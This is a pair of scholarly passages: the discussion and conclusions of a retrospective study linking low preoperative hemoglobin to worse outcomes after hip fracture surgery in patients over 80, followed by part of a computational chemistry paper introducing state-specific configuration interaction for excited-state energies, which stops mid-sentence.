For postoperative complications, sixty-seven MACEs and twenty-six deaths were identified during hospitalization after surgery. After adjusting for all potential confounders (age, sex, ASA classification, diagnosis, anesthesia methods, surgery types, and comorbidities) for the endpoints, the relationship between preoperative hemoglobin level and MACEs/other composite complications were shown in Figure 2. According to the graph, a preoperative hemoglobin level higher than 10 g/DL decreased the occurrence of complications. With univariable logistic analysis, the hemoglobin level <10 g/DL cohort was associated with increased MACEs [ The log-rank analysis also showed increased hospital length of stay in the cohort with a preoperative hemoglobin level <10 g/DL (Table 2). Additionally, Kaplan-Meier analysis demonstrated that a hemoglobin level <10 g/DL was associated with higher in-hospital mortality (Figure 3).
Sensitivity Analysis
To test the results of the study, the patients between 80 years and 89 years were analyzed to verify the strength of the outcomes. The results were consistent with the previous analysis (Table 3).
Discussion
In the current study, we demonstrate that for patients over 80 years receiving hip fracture surgery, a preoperative hemoglobin level <10 g/DL might be associated with increased postoperative MACEs, in-hospital mortality, and more transfusions >2 U. The results are the same even after multivariable adjustment and subgroup analysis. A. Preoperative hemoglobin level and RCS of MACEs. Results were adjusted for age, sex, ASA classification, diagnosis, anesthesia methods, surgery, and comorbidities (COPD, hypertension, diabetes, heart failure, atrial fibrillation, preoperative pneumonia, and renal failure). The pink color zone represents the 95% confidence intervals for the spline model. B. Preoperative hemoglobin level and RCS of other composite complications. Results were adjusted for age, sex, ASA classification, diagnosis, anesthesia methods, surgery, and comorbidities (COPD, hypertension, diabetes, heart failure, atrial fibrillation, preoperative pneumonia, and renal failure). The pink color zone represents the 95% confidence intervals for the spline model.
Several studies have explored the relationship between preoperative anemia and postoperative outcomes. A retrospective cohort study reported by Musallam and colleagues analyzed data from 227 425 patients undergoing noncardiac surgery and concluded that preoperative anemia was independently associated with an increased risk of 30-day morbidity and mortality. 5 Furthermore, they found that even with a mild degree of preoperative anemia, composite postoperative morbidity at 30 days was higher in patients with anemia than in those without anemia. Their research focused on femoral neck fracture and surgery of arthroplasty, but the intertrochanteric fracture happened more frequently in the over 80 years old group and arthroplasty was not priority as other surgery types in over 80 years. Another large-scale retrospective cohort study recorded 5 922 primary arthroplasty procedures and reported that the presence of anemia in the cohort was associated with inferior outcomes after arthroplasty. Anemics were more likely to require blood transfusion than patients without preoperative anemia, which was consistent with our conclusion. Furthermore, they also found that anemics were more likely to have postoperative complications than patients without anemia. 6 Similarly, we reported increased cardiovascular-related complications and in-hospital mortality, which agreed with the results of Bailey and colleagues.
Compared to other factors, such as old age, anemia is a modifiable preoperative condition. There is a lack of a universal preoperative hemoglobin threshold for frail elderly patients over 80 years receiving hip fracture surgery. Transfusion guidelines 2011 recommended preoperative hemoglobin levels of 9 g/DL or 10 g/DL for patients with a history of ischemic heart disease as the transfusion threshold and suggested a higher blood transfusion trigger for older patients. 14 In Denmark, a hemoglobin level of 9.7 g/DL is recommended as the RBC transfusion threshold. 15 Guidelines for the management of hip fractures 2021 recommended that the recognition and management of blood should precede according to an agreed-upon hospital protocol. 16 What is the optimal preoperative hemoglobin level for hip fracture patients over 80 years? The recommendations from the 2018 Frankfurt consensus conference suggested 8 g/DL in patients with hip fracture and cardiovascular disease or other risk factors. However, although data from 17 607 literature citations and 145 studies, including 63 RCTs with 23 143 patients and 82 observational studies with more than 4 million patients, were analyzed, this was a conditional recommendation, and only 10 studies analyzed hip fracture patients. Furthermore, none of the studies focused on patients over 80 years old. 17 Neef and colleagues 18 pointed out the current situation and concluded that preoperative anemia management has not yet been established, but the results of the studies confirmed the positive effect of preoperative anemia diagnosis and treatment. However, for the special group of hip surgery patients over 80 years, the workflows of inspection and correction of preoperative anemia were established in our center. The guidelines in 2018 suggested that the hemoglobin trigger could be lower than 10 g/DL, but the evidence for frail hip fracture patients over 80 years old was insufficient. 19 Although blood management in cardiac surgery favors the restrictive transfusion strategy compared to the liberal transfusion strategy. 20-23 trials and reviews focused on hip fracture patients hold a different view. A context-specific systematic review and metaanalysis reported that restricted transfusion strategies should be applied with caution in high-risk patients undergoing major surgery and this may be detrimental. 24 It was a systematic review in perioperative and acute care settings according to patient characteristics and clinical settings and was closer to real-world research. A metaanalysis by Gu and colleagues 25 reviewed ten studies and found that restrictive transfusion (mostly a hemoglobin level of 8 g/DL or symptomatic anemia) increases the risk of cardiovascular events compared to liberal (mostly a hemoglobin level of 10 g/DL) transfusion (RR = 1.51, 95% CI: 1.16, 1.98; P = .003) in patients undergoing hip fracture surgery. The TRIFE randomized controlled trial enrolled 284 hip fracture patients over 65 years of age and concluded that for frail elderly hip fracture patients, recovery from a physical disabilities transfusion strategy (threshold 9.7 g/DL) was similar to a liberal strategy (<11.3 g/DL). 26 Our retrospective study explored the optimal preoperative hemoglobin level for elderly hip fracture patients over 80 years of age and concluded that a preoperative hemoglobin level >10 g/DL might be associated with lower postoperative morbidity and mortality, which supported the results of the Gu and TRIFE studies.
One strength of our study is that it focuses on a subgroup of hip fracture patients over 80 years, who are the most vulnerable population of hip fracture patients and are at high risk of perioperative morbidity and mortality. Another strength of our study is that RCS was used to explore the optimal hemoglobin level for the group of patients. There are also some limitations in the study. First, it is a retrospective observational study. RCS and different statistical analyses were used to test the validity of the results. The subgroup of 80 years to 89 years confirmed the results and conclusions of the study. Second, a lower preoperative hemoglobin level of <10 g/DL was associated with more transfusions, and transfusions may be associated with some of the clinical outcomes.
Conclusions
In conclusion, for hip fracture patients over 80 years, a preoperative hemoglobin level of <10 g/DL was associated with an increase in postoperative MACEs, in-hospital mortality, and transfusion >2 U rate. Furthermore, we obtained the same results even after multivariable adjustment and subgroup analysis for hip fracture patients over 80 years. It is indicated that increasing the preoperative hemoglobin above 10 g/DL might lower the postoperative MACEs, in-hospital mortality and perioperative transfusion > 2U. | 2023-06-18T05:15:43.483Z | 2023-06-01T00:00:00.000 | {
"year": 2023,
"sha1": "8a80b6e02107da482783a4c4b57093b521b839f6",
"oa_license": "CCBYNC",
"oa_url": "https://doi.org/10.1177/21514593231183611",
"oa_status": "GOLD",
"pdf_src": "PubMedCentral",
"pdf_hash": "8a80b6e02107da482783a4c4b57093b521b839f6",
"s2fieldsofstudy": [
"Medicine"
],
"extfieldsofstudy": [
"Medicine"
]
} |
253384202 | pes2o/s2orc | v3-fos-license | State-Specific Configuration Interaction for Excited States
We introduce and benchmark a systematically improvable route for excited-state calculations, labeled state-specific configuration interaction (ΔCI), which is a particular realization of multiconfigurational self-consistent field and multireference configuration interaction. Starting with a reference built from optimized configuration state functions, separate CI calculations are performed for each targeted state (hence, state-specific orbitals and determinants). Accounting for single and double excitations produces the ΔCISD model, which can be improved with second-order Epstein–Nesbet perturbation theory (ΔCISD+EN2) or a posteriori Davidson corrections (ΔCISD+Q). These models were gauged against a vast and diverse set of 294 reference excitation energies. We have found that ΔCI is significantly more accurate than standard ground-state-based CI, whereas close performances were found between ΔCISD and EOM-CC2 and between ΔCISD+EN2 and EOM-CCSD. For larger systems, ΔCISD+Q delivers more accurate results than EOM-CC2 and EOM-CCSD. The ΔCI route can handle challenging multireference problems, singly and doubly excited states, from closed- and open-shell species, with overall comparable accuracy and thus represents a promising alternative to more established methodologies. In its current form, however, it is reliable only for relatively low-lying excited states.
I. INTRODUCTION
Most molecular electronic structure methods rely on different descriptions of ground and excited states. The ground state is described first, at a given level of theory, providing a baseline for later accessing the excited states, which in turn makes use of another approach or a distinct formalism altogether. For example, Kohn−Sham (KS) density-functional theory (DFT) is a ground-state method, 1−3 whereas the excited states are obtained later with a linear response treatment of timedependent density-functional theory (TDDFT). 4−7 Similarly, the coupled-cluster (CC) 8−11 equations are solved for the ground state, whereas a diagonalization of the similaritytransformed Hamiltonian is implied in excited-state calculations based on the equation-of-motion (EOM) 12,13 or linearresponse 14,15 formalisms. Within configuration interaction (CI) methods, 16 the underlying formalism is the same for ground and excited states, but typical implementations also rely on a special treatment for the ground state, given the use of ground-state Hartree−Fock (HF) orbitals and the fact that the truncated CI space is spanned by excitations from the groundstate HF determinant.
Whereas the above-mentioned methods rely on a single determinant reference, enlarging the reference space with more than one determinant gives rise to multireference approaches. In multiconfigurational self-consistent field (MCSCF), 17−20 the wave function is expanded as a linear combination of an arbitrary set of determinants, and the orbitals (and the coefficients of these determinants) are optimized to make the energy stationary. The most employed type of MCSCF is the complete active space self-consistent field (CASSCF), 18 which allows for all determinants generated by distributing a given number of electrons in a given number of active orbitals. Multireference CI (MRCI) offers a route to go beyond MCSCF by considering excited determinants generated from the reference space, which in practice is limited to single and double excitations (MRCISD). The MRCISD energy can be further improved with so-called Davidson corrections. 21−23 Apart from multireference approaches, 23,24 single-reference excited-state methods entail a formal distinction between the targeted excited states and the ground state. It is thus important to devise methods that minimize this unbalance as much as possible, aiming at a more unified description of ground and excited states while maintaining a modest computational cost. This also means a more balanced description among the excited states, and here we highlight the case of singly and doubly excited states, which differ by the number of excited electrons during the electronic transition. Most excited-state methodologies either fail to properly describe doubly excited states or require higher-order excitations to be accounted for. 25 In this sense, a methodology that offers comparable accuracy for singly and doubly excited states would be equally desirable.
MCSCF methods can be either state-averaged, when the reference space is optimized for an ensemble of (typically equally weighted) states, or state-specific, when the optimization is performed for one targeted state. The state-averaged strategy is much more used in practice mostly because of the more straightforward and reliable orbital optimization and the easier calculation of transition properties (given the common set of orbitals) when compared to the state-specific approach. 26−33 However, state-averaged MCSCF faces several issues. It struggles to describe higher-lying states or a large number of states, the orbitals may favor some states to the detriment of others, 34−37 the potential energy curves can become discontinuous, 36,38,39 and the calculation of energy derivatives is complicated by the energy averaging. 40−42 Many if not all of these problems do not appear in state-specific MCSCF, which in turn has to deal with a more challenging orbital optimization problem.
In light of these motivations, there has been ever-growing interest in state-specific MCSCF 36,37,43,44 and state-specific methods in general. The general principle is to employ a single formalism, approaching each state of interest independently and without resorting to any prior knowledge about the other states. The first and probably the most well-known state-specific method is ΔSCF, 45,46 where excited states are described by a single determinant and represent higher-lying solutions of the HF or KS equations. By optimizing the orbitals for a non-Aufbau determinant, ΔSCF attempts to recover relaxation effects already at the mean-field level. There is a growing body of evidence showing that DFT-based ΔSCF usually outperforms TDDFT, 43,47−56 most notably for doubly excited and charge transfer states. 50,51 However, ΔSCF still represents a major limitation to open-shell singlet states because of strong spin contamination associated with the single-determinant ansatz. Restricted open-shell Kohn−Sham (ROKS) 47,57 offers one way around this problem, by optimizing the orbitals for a Lagrangian that considers both the mixed-spin determinant and the triplet determinant with spin projection M s = 1. In wave function-based methods, excited-state mean field (ESMF) theory 43,52,53 has been proposed as a state-specific MCSCF alternative to excited states. In the ESMF approach, excited-state orbitals are optimized for a CI with a single excitations (CIS) ansatz, 16 and energies can be further corrected with second-order Møller−Plesset (MP2) perturbation theory. 43,58 An extension of ESMF to DFT has also been proposed. 59 Variants of CC methods that directly target excited states have also been actively pursued. 60−63 An important practical question for all of the aforementioned methods concerns the optimization of orbitals for excited states, which typically appear as saddle point solutions in the orbital parameter space, 44,63−66 therefore being more difficult to obtain than ground-state solutions. 67−69 In this sense, specialized algorithms for obtaining excited-state orbitals have been proposed and developed by several groups. [48][49][50]54,55 Related methods that aim at describing multiple states within the same theoretical framework, though usually in a state-averaged fashion, include CASSCF, 18
II. STATE-SPECIFIC CI
Here we propose a particular realization of state-specific MCSCF and MRCI as a route for excited-state calculations.
First, the orbitals are optimized at the MCSCF level, comprising a minimal set of configuration state functions (CSFs), as illustrated in Figure 1, which provides a state-specific reference.
By running separate calculations for the ground state and for a targeted excited state, excitation energies can be obtained as the energy difference between the individual total energies. We label this approach ΔCSF, in close parallel to the ΔSCF method. When compared with larger MCSCF choices, the compactness of ΔCSF avoids redundant solutions and is expected to facilitate the convergence toward excited states. For a single CSF ansatz in particular, the CI coefficients are fixed by the desired spin eigenstate, eliminating the redundancies associated with the coupling between CI coefficients and orbital rotations. Furthermore, by being a proper eigenstate of the total spin operator, ΔCSF cures the spin-contamination problem of ΔSCF, thus leading to truly state-specific orbitals and an improved reference, particularly for singlet excited states. Finally, being a mean-field method [with an N ( ) 5 computational cost associated with the integral transformation, where N is the number of basis functions], ΔCSF is intended to provide a balanced set of reference wave functions for a subsequent, more accurate calculation.
At this second stage, correlation effects are captured by performing separate MRCI calculations for each state. Since ground-and excited-state references are of mean-field quality and are state-specific, this particular type of MRCI calculation is labeled ΔCI here. When accounting for all single and double excitations, we obtain the ΔCISD model, which is now expected to provide decent excitation energies with an N ( ) 6 computational scaling. Notice that because we perform all singles and doubles with respect to each reference determinant, the maximum excitation degree is potentially higher than two (except of course for a one-determinant reference). This also applies to higher-order CI calculations. In this way, each state is described as much as possible in a state-specific way with a different set of orbitals as well as determinants. Also notice that since we aim for a state-specific treatment of correlation, one cannot anticipate which root of the CI calculation corresponds to the state for which the orbitals have been optimized. It is not uncommon, for instance, to find a targeted excited state lower in energy than the physical ground state since the former is much more correlated than the latter in the corresponding statespecific CI calculation. We identified the state of interest by simply inspecting the coefficients of the reference determinants.
We can further compute the renormalized second-order Epstein-Nesbet (EN2) perturbation correction 85 from the determinants left outside the truncated CISD space of each calculation, giving rise to the ΔCISD+EN2 model. The EN2 perturbative correction involves a single loop over external determinants that are connected to the internal determinants via at most double excitations, thus entailing an overall N ( ) 8 scaling associated with the number of quadruply excited determinants. Despite this unfavorable scaling, the corresponding prefactor of the EN perturbative correction is rather small, making such calculations affordable. Alternatively, we could calculate one of the several types of a posteriori Davidson corrections 21−23 in a state-specific fashion, leading to a ΔCISD +Q approach. We recall that computing Davidson corrections is virtually free such that ΔCISD+Q presents the same computational cost and N ( ) 6 scaling as ΔCISD. 86 The remaining question is how to build an appropriate reference for each state of interest. Our general guideline is to select the smallest set of CSFs that provides a qualitatively correct description of the state of interest, as shown in Figure 1.
Here we adopted the spin-restricted formalism. The HF determinant is the obvious choice for the ground state of closed-shell singlets. For singly excited states of closed-shell systems, we chose either one or two CSFs, depending on each particular excited state. For most cases, a single CSF associated with two unpaired electrons should be enough. Some excited states, however, display strong multireference character, such as those of N 2 , CO 2 , and acetylene, thus requiring two CSFs. For genuine doubly excited states where a pair of opposite-spin electrons are promoted from the same occupied to the same virtual orbital, we selected a single determinant associated with the corresponding double excitation. In turn, open-shell doubly excited states were described with a single open-shell CSF (just as for most singly excited states). For ground and excited states of open-shell doublets, a single-determinant restricted openshell HF reference is adopted as well.
As mentioned before, our ΔCISD approach can be seen as a type of MRCI, although with two key differences with respect to typical realizations of MRCI. 23 First, it relies on a minimal set of CSFs as the reference space, whereas in typical applications of MRCI the reference is built from a much larger complete active space. This means that the CI space becomes more amenable in the former approach, enabling calculations for larger systems. The second important difference is that the reference in ΔCISD is state-specific, which is expected to favor the overall fitness of the orbitals when compared with state-averaged orbitals of standard MRCI (whenever excited states are involved). ΔCISD also resembles the ESMF theory 43,52,53 of Neuscamman and coworkers in their underlying motivation: a state-specific meanfield-like starting point, subject to a subsequent treatment of correlation effects. In ΔCISD, however, the starting point is much more compact and arguably closer to a mean-field description than the CIS-like ansatz of ESMF. This makes the CI expansion up to double excitations feasible in our approach, though not in ESMF, which in turn resorts to generalized MP2 to describe correlation. 43,58 This ΔCSF ansatz has already been suggested as a more compact alternative to the ESMF one 52 but again in the spirit of recovering correlation at the MP2 level, whereas we propose a state-specific CISD expansion that could be followed by Davidson or EN2 perturbative corrections.
III. COMPUTATIONAL DETAILS
Our state-specific CI approach was implemented in QUANTUM PACKAGE, 85 whose determinant-driven framework provides a very convenient platform for including arbitrary sets of determinants in the CI expansion. In this way, we can easily select only the determinants that are connected to the reference determinants according to a given criterion provided by the user. On top of that, the state-specific implementation further profits from the configuration interaction using a perturbative selection made iteratively (CIPSI) algorithm 87−90 implemented in QUANTUM PACKAGE, which allows for a large reduction of the CI space without a loss of accuracy. At each iteration of the CIPSI algorithm, the CI energies are obtained with the Davidson iterative algorithm, 91 which ends when the EN2 perturbation correction computed in the truncated CI space lies below 0.01 mE h . 90 Our state-specific CI implementation can be employed for different selection criteria for the excited determinants, based, for example, on the seniority number, 92 the hierarchy parameter, 93 or the excitation degree. Here, we considered the more traditional excitation-based CI. After the CI calculation, we computed the renormalized EN2 perturbation correction 85 from the determinants left outside the truncated CI space, which is relatively cheap because of the semistochastic nature of our algorithm. 94 We also evaluate the seven variants of Davidson corrections discussed in ref 23.
To get state-specific orbitals, we first ran a CIS calculation and obtained the natural transition orbitals (NTOs), 95 which proved to be more suitable guess orbitals than the canonical HF orbitals. The dominant hole and particle NTOs are taken as the singly occupied orbitals, and for pronounced multireference states, the second most important pair of NTOs was also considered (as illustrated in Figure 1). For the doubly excited states, a non-Aufbau occupation of the canonical HF orbitals was used as guess orbitals, based on the expected character of the excitation. The orbital optimization was performed with the Newton− Raphson method, also implemented in Quantum Package. 63,65 Having our state-specific approaches presented, our main goal here is to assess their performance in describing electronic excited states. For that, we calculated vertical excitation energies for an extensive set of 294 electronic transitions for systems, states, and geometries provided in the QUEST database. 96 We considered small-97,98 and medium-sized 99,100 organic compounds, radicals, "exotic" systems 101 and doubly excited states. 98−100 The set of excited states comprises closed-shell (singlets and triplets) and open-shell (doublets) systems, ranging from one to six non-hydrogen atoms and of various character (valence and Rydberg states as well as singly and doubly excited states). We employed the aug-cc-pVDZ basis set for systems having up to three non-hydrogen atoms and the 6-31+G(d) basis set for the larger ones. We compared the excitation energies obtained with our state-specific approaches against more established alternatives, such as CIS, 102 CIS with perturbative doubles [CIS(D)], 103,104 CC with singles and doubles (CCSD), 13,105−107 and the second-order approximate CC with singles and doubles (CC2), 108,109 with the latter two understood as EOM-CC. The excitation energies obtained with the different methodologies were gauged against very accurate reference values, of high-order CC or extrapolated full CI quality. [97][98][99]101 The complete set of reference methods and energies is provided in the Supporting Information.
IV. RESULTS AND DISCUSSION
A. Orbital Optimization. Our first important result is that the combination of the Newton−Raphson method starting with NTOs proved to be quite reliable in converging the ΔCSF ansatz to excited-state solutions. To a great extent, this is assigned to the compact reference of ΔCSF, which avoids the redundant solutions associated with larger MCSCF references. In most cases, the orbitals are optimized with relatively few iterations (typically less than 10) and to the correct targeted state. A second-order method such as Newton−Raphson is required if the targeted solution is a saddle point in the orbital rotation landscape, which is expected to be the case for excited states. 44,66 At convergence, the number of negative eigenvalues of the orbital Hessian matrix, i.e., the saddle point order, can provide further insights into the topology of the solutions for a given CSF ansatz. The full list of saddle point orders is shown in the Supporting Information. For the closed-shell systems, we found that the lowest-lying solution (global minimum) obtained with the open-shell CSF is always an excited state since it cannot properly describe the closed-shell character of the ground state. In turn, higher-lying excited states tend to appear as saddle points of increasing order as one goes up in energy, even though this behavior is not very systematic. It was not uncommon, for example, to encounter two different excited states as local minima or that share the same saddle point order. For some systems, we searched for symmetry-broken solutions of excited states by rotating the orbitals along the direction associated with a negative eigenvalue of the orbital Hessian, but this procedure leads to solutions representing different states. We did not explore this exhaustively, though, and we cannot rule out the existence of symmetry-broken excited-state solutions. It is also worth mentioning that the starting orbitals typically presented a much larger number of negative Hessian eigenvalues that decreased in the course of orbital optimization. This means that the saddle point order cannot be anticipated on the basis of information about the unrelaxed orbitals or the expected ordering of the states.
Importantly, state-specific solutions could be found for different types of states, including singly and doubly excited states, for closed-shell singlets and open-shell doublets, and for the first as well as higher-lying states of a given point group symmetry. For this last class of states, however, our single CSF approach is not always reliable, especially for fully symmetric higher-lying states. In some cases, a closed-shell determinant is also important (as revealed by the subsequent CISD calculation) but remains outside the open-shell CSF reference. In these situations, employing both open-and closed-shell determinants in the reference is expected to improve the description of these higher-lying excited states, and we plan to explore this approach in the future. More generally, convergence issues would be expected at energies displaying a high density of excited states.
The excited-state reference could also be based on singledeterminant ΔSCF orbitals rather than the ΔCSF orbitals we have adopted. However, the former method is heavily spincontaminated, being an exact mixture of singlet and triplet, whereas the latter method targets one spin multiplicity at a time. In this way, the excitation energies obtained with ΔCSF appear above (for singlets) and below (for triplets) the single energy obtained with ΔSCF, overall improving the comparison with the reference values. In turn, we compared ΔSCF and ΔCSF excited-state orbitals for ΔCISD calculations and found overall little differences in the excitation energies. Still, we think ΔCSF is preferable because it delivers truly state-specific orbitals, whereas ΔSCF produces the same orbitals for the singlet and triplet states and is thus less state-specific.
B. State-Specific vs Standard CI. The state-specific ΔCI approach offers a well-defined route toward full CI by increasing the excitation degree, by analogy to standard ground-state-based CI methods. We explored both routes by calculating 16 excitation energies for small systems, by considering up to quadruple excitations. (The full set of results is available in the Supporting Information.) Even though this is a small set for obtaining significant statistics, it is enough to showcase the main trends when comparing state-specific and ground-state-based CI methods. The mean signed error (MSE), mean absolute error (MAE), and root-mean-square error (RMSE) are shown in Table 1. The convergence for standard CI is quite slow, with CISD largely overestimating the excitation energies and CISDT leading to more decent results, which are improved at the CISDTQ level. In turn, we found that ΔCI displays much more accurate results and accelerated convergence than their groundstate-based counterparts. At the ΔCISD level, the accuracy is far superior to that of standard CISD, being comparable to that of CISDT. Going one step further (ΔCISDT) does not lead to a visible improvement, whereas the state-specific quadruple excitations of ΔCISDTQ recover much of the remaining correlation energy of each state and hence the very accurate excitation energies. These observations parallel the common knowledge that the ground-state correlation energy is mostly affected by the double excitations and that quadruples are more important than triples, meaning that the state-specific ΔCI approach manages to capture correlation effects in a reasonably balanced way for ground and excited states. This also motivates us to investigate various flavors of the Davidson correction, which attempts to capture the missing contribution from the quadruple excitations. As will be discussed in more detail later, the popular Pople correction, 22 labeled ΔCISD+PC from here on, was found to be somewhat more accurate than the others. The comparable MAEs of ΔCISD and CISDT can be understood from the observation that the doubly excited determinants accessed from the excited-state reference can be achieved only via triple excitations from the ground-state reference. The comparison between state-specific and groundstate-based CI for a given excitation degree (ΔCISD against CISD and ΔCISDTQ against CISDTQ) shows that the MAEs are reduced by 1 order of magnitude in the former route when compared with the latter. However, no gain is observed from CISDT to ΔCISDT. C. State-Specific CI vs Other Methods. We now start the discussion on how well our state-specific CI approaches compare with more established methods by presenting in Figure 2 and Table 2 the distribution of errors and statistical measures associated with a set of 237 singly excited states of closed-shell systems.
At the ΔCSF level, the excitation energies are systematically underestimated, thus resulting in a substantially negative MSE. A large absolute MSE would be expected from any mean-field approach. At least to some extent, the bias toward underestimated energies appears because the CSF reference for the excited states (typically containing two determinants) already recovers some correlation, whereas the one-determinant HF reference of the ground state does not. The MAE of the ΔCSF approach (0.62 eV) is comparable to that of CIS (0.65 eV). The overall similar performance of these two methods is somewhat expected since the orbital relaxation that takes place in the statespecific CSF is partially described via the single excitations of CIS.
Moving to the ΔCISD level, we find that correlation effects are described in a reasonably balanced way for the ground and excited states. The MAE is significantly reduced (0.18 eV) with respect to that of ΔCSF, being smaller than that in CIS(D) (0.21 eV) and comparable to that in CC2 (0.17 eV). The absolute MSE also decreases but remains negative, whereas the other CIor CC-based methods present positive MSEs. This shows that there is still some bias toward a better description of excited states at the ΔCISD level, probably due to the two-determinant reference (compared to one determinant for the ground state). In addition, higher-lying fully symmetric states are not as well described at the ΔCISD level, reflecting the lack of a closed-shell determinant in the reference, as discussed above. However, we did not discard these states from the statistics.
The perturbative correction introduced with the ΔCISD +EN2 approach reduces the statistical errors even more, showing the same MAE as that of CCSD (0.06 eV). At times, however, the EN2 correction leads to erroneous results due to the presence of intruder states, which sometimes appear for the more problematic higher-lying states of a given symmetry. We discarded 10 out of 294 problematic cases when evaluating the statistics of the ΔCISD+EN2 results. Instead of relying on perturbation theory to correct the CISD total energies, we can resort to one of the Davidson corrections. 23 Even though this correction is not as accurate as the EN2 perturbative energy, more often than not it improves upon ΔCISD, with virtually no additional computational cost. For the ΔCISD+Q statistics, we discarded 12 out of 294 data points where ∥c∥ < 0.9, in which c gathers the coefficients of the reference determinants in the CI expansion. We found that all seven ΔCISD+Q variants provide MAEs in the 0.10−0.12 eV range, with the individual distribution of errors and statistical measures presented in Figure 3. As alluded to before, the Pople corrected flavor, ΔCISD+PC, is arguably the most well-behaved, with fewer outlier excitation energies and the lowest MAE of 0.10 eV.
We also surveyed the performance of our state-specific methods for 10 genuine doubly excited states 25 and 47 excited states of open-shell doublets (doublet−doublet transitions), 101 in which both sets were extracted from the QUEST database. 96 The statistical measures are shown in Table 3, together with those of singly excited states of closed-shell systems. The important finding in this comparison is that state-specific 25 We notice that the MSE of ΔCSF is more negative for singly excited states of closed-shell molecules (−0.55 eV) than for doubly excited states (−0.20 eV), being closer to zero for doublet−doublet transitions (+0.07 eV), which reflects the one-determinant reference adopted for both the excited and ground states in the latter cases. However, this difference does not translate into comparatively smaller errors in the correlated results. For the doubly excited states, we further compare in Table 4 the performance of state-specific CI against that of higher-order CC methods. The accuracy of the ΔCSF mean-field model is superior to that of CC3 and approaches that of CCSDT, which highlights the importance of orbital relaxation for doubly excited states. ΔCISD is significantly more accurate than CCSDT, whereas the perturbative and Davidson corrections bring a small improvement. Recent developments and promising results with state-specific CC 54,62−64 and DFT 50,51 for doubly excited states are worth mentioning. However, these approaches are still restricted to states dominated by a single closed-shell determinant, whereas the ΔCISD approach can handle both closed-and open-shell doubly excited states. Out of the 10 doubly excited states we investigated, only 5 (beryllium, ethylene, formaldehyde, nitroxyl, and nitrosomethane) can be qualitatively described with a single closed-shell determinant, whereas at least 2 determinants are needed for the remaining 5 states: 2 closed-shell determinants for glyoxal and for the two states of the carbon dimer (C 2 ) and 4 closed-shell determinants for the two states of the carbon trimer (C 3 ).
D. Types of Excitations. The performance of our statespecific methods can also be assessed for specific types of excited states, e.g., for ππ* transitions or for systems of a given size. This is shown in Table 5, which compares the MAEs across different categories, whereas the corresponding MSEs and RMSEs can be found in Tables S1 and S2 in the Supporting Information. Many trends can be identified, but here, we highlight the most notorious and interesting ones.
Starting with spin multiplicity, we found that the ΔCISD results are comparable for singlets and triplets, whereas the perturbative correction has a more pronounced effect for the triplets, bringing the MAE down to 0.06 eV, the same as (Tables 3 and 4).
Regarding the character of the excitations, we found that ΔCISD is considerably better for Rydberg (MAE of 0.12 eV) than for valence (MAE of 0.21 eV) excited states. In turn, the EN2 correction has a larger impact on valence excitations, making little difference for the Rydberg states, such that the ΔCISD+EN2 results become comparable for both types of excitation, with MAEs of 0.08 to 0.10 eV. Additional trends can be observed when dividing the valence excitations into nπ*, ππ*, or σπ* and the Rydberg excitations as taking place from n or π orbitals. Our state-specific methods are typically more accurate for nπ* excitations than for ππ* excitations. ΔCISD+EN2, for example, is as accurate as CCSD for nπ* transitions, with corresponding MAEs of 0.06 eV. We also found that the less common σπ* excitations are much better described across all methods than the more typical nπ* and ππ* transitions. For this type of state, ΔCISD+EN2 is the best-performing method, with MAEs as small as 0.03 eV. When the Rydberg states are separated by the character of the hole orbital, n or π, additional interesting features can be seen. Except for CCSD, all of the other methods considered here provide more accurate results for the Rydberg excitations involving the π orbitals. Not only that, but the MAEs are quite small and comparable across all methods (except for ΔCSF and CIS), ranging from 0.06 to 0.11 eV. Surprisingly, CIS is much more accurate for π Rydberg (MAE of 0.29 eV) than for n Rydberg (MAE of 1.17 eV) excitations.
The third and most important line of comparison concerns the system size. Under this criterion, we divided the excited states into three groups, small, medium, and large, depending on the number of non-hydrogen atoms (Table 5). We found that ΔCSF becomes more accurate as the system size increases, which we assign to a diminishing effect of the one-vs twodeterminant imbalance discussed above. As the system size increases, the correlation energy recovered by the two determinants of the excited states (at the ΔCSF level) is expected to become smaller in comparison to the total correlation energy (associated with the full Hilbert space), thus alleviating this imbalance. In contrast, CISD should provide less accurate total energies for larger systems due to its wellknown lack of size consistency. This issue would be expected to reflect on excitation energies to some degree, which are not absolute but relative energies. However, a more balanced reference provided by ΔCSF might compensate for the lack of size consistency when larger systems are targeted. Indeed, ΔCISD presents comparable MAEs across the three sets of system size (0.15 to 0.18 eV). In contrast, ΔCISD+Q and ΔCISD+EN2 seem to go opposite ways: the former becomes more accurate, and the latter, less accurate as a function of system size. Similarly, CC2 becomes more accurate and CCSD loses accuracy as the system size increases, 99,110 to the point where the theoretically more approximate CC2 becomes the favored methodological choice. It remains to be seen how the absence of size-consistency in ΔCISD impairs the results for even larger systems compared to those considered here and the extent to which Davidson or perturbative corrections reduce this problem. For molecules containing five or six non-hydrogen atoms, ΔCISD+EN2 becomes practically as accurate as CCSD, with MAEs in the 0.10−0.12 eV range. The ΔCISD+Q models turn out to be the most accurate choice for systems of this size, with MAEs ranging from 0.07 to 0.09 eV (Table S3 in the Supporting Information) and ΔCISD+PC displaying a MAE of only 0.07 eV. In particular, it is more accurate than CCSD while sharing the same N ( ) 6 computational scaling and more accurate than CC2, despite remaining less black-box and more expensive than the N ( ) 5 scaling of the latter. Overall, the present statistics position our state-specific approaches as encouraging alternatives for describing larger systems despite the remaining issues regarding higher-lying excited states. The MAEs of the seven variants of Davidson corrections, separated by type of excitation, are presented in Table S3 of the Supporting Information. We recall that different basis sets have been used (the aug-cc-pVDZ basis set for systems with up to three nonhydrogen atoms and the 6-31+G(d) basis set for the larger ones), which could have some impact on the trends as a function of system size for a given method. Despite the different basis sets, the comparison between different methods for a given system size remains valid.
E. Specific Applications. Butadiene, glyoxal, C 2 and C 3 are particularly interesting and challenging systems that deserve a dedicated discussion. The excitation energies are gathered in Tables 6, 7, 8, and 9, respectively. 111,112 More recently, though, it has been reassigned as a singly excited state, 113 meaning that the doubly excited determinants actually represent strong orbital relaxation effects (single excitations from the dominant singly excited determinant). Here, our state-specific results (shown in Table 6) support this interpretation, since one CSF associated with a single excitation provided reasonable excitation energies, whereas attempts to employ a doubly excited reference produced much higher-lying solutions. At the ΔCSF level, we obtained an excitation energy (7.18 eV) comparable to the much more expensive CCSD (7.20 eV), although still overestimating the CCSDTQ reference value of 6.56 eV. 99 This result demonstrates the ability of ΔCSF to capture orbital relaxation effects at only a mean-field cost, which in contrast needs at least double excitations in EOM-CC. The inclusion of correlation at the ΔCISD level brings the excitation energy down to 6.93 eV. An important question in butadiene concerns the energy gap between the 2 1 A g dark state and the lower-lying 1 1 B u bright state, whose correct ordering has only recently been settled. 114 Having the CCSDTQ reference value of 0.15 eV for the energy 